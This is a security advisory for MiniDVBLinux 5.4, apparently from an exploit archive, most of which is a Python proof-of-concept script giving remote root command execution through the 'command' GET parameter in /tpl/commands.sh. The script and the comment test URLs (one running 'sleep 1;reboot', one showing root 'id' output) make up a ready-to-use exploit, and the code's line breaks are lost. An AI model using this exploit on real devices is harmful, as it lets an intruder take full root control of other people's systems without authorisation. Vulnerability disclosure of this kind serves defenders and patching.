MiniDVBLinux 5.4 Remote Root Command Execution
MiniDVBLinux version 5.4 suffers from an OS command execution vulnerability. This can be exploited to execute arbitrary commands as root through the command GET parameter in /tpl/commands.sh.
#!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command execution vulnerability.# This can be exploited to execute arbitrary commands as root, through the# 'command' GET parameter in /tpl/commands.sh.## Tested on: MiniDVBLinux 5.4# BusyBox v1.25.1# Architecture: armhf, armhf-rpi2# GNU/Linux (armv7l)# VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2022-5718# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php### 24.09.2022#import requestsimport re,sys#test case 002#http://ip:8008/?site=commands§ion=system&command=sleep%201;reboot#-#test case 003#http://ip:8008/?site=commands§ion=system&command=id#uid=0(root) gid=0(root)if len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Execution PoC') print('Usage: ./mldhd_root1.py [url] [cmd]') sys.exit(17)else: url = sys.argv[1] cmd = sys.argv[2]req = requests.get(url+'/?site=commands§ion=system&command='+cmd)req = requests.get(url+'/?site=commands§ion=system&command='+cmd)outz = re.search('log\'>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('log\'>','').replace('</pre>',''))